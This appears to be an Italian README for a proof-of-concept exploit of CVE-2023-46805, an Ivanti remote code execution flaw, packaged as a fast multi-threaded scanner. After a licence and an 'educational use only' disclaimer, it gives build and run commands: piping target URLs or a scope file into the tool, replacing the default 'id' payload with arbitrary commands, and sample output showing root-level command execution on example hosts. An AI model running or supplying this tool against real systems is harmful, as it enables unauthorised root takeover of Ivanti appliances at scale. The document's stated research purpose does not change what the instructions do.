
CVE-2023-46805 Ivanti POC RCE - Scanner ultraveloce.
Titolo: Proof of Concept per CVE-2023-46805 - Solo per uso educativo
Licenza: Questo lavoro è rilasciato sotto la Creative Commons Attribution 4.0 International License (CC BY 4.0). Sei libero di condividere, copiare, distribuire e trasmettere questo lavoro, di adattarlo o utilizzarlo per altri scopi, a condizione che venga attribuita la paternità in modo appropriato.
Disclaimer: Questa Proof of Concept (PoC) è fornita esclusivamente a scopo educativo e di ricerca sulla sicurezza informatica. Né l'autore, né l'organizzazione affiliata, né qualsiasi altra parte coinvolta nella creazione, produzione o consegna di questo contenuto sarà ritenuta responsabile per danni, inclusi, a titolo esemplificativo, danni diretti, indiretti, incidentali, speciali, consequenziali o punitivi derivanti dall'uso o dall'incapacità di utilizzare questo contenuto.
Obiettivo educativo: Questa PoC è intesa ad aiutare la comunità della sicurezza informatica a comprendere e mitigare la vulnerabilità identificata come CVE-2023-46805. Non deve essere utilizzata in un ambiente di produzione o per attività dannose.
Descrizione della vulnerabilità: Ivanti RCE
Dettagli della PoC:
Usage of ./CVE-Ivanti:
-cmd string
The command to replace 'id' in the payload (default "id")
-t int
Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'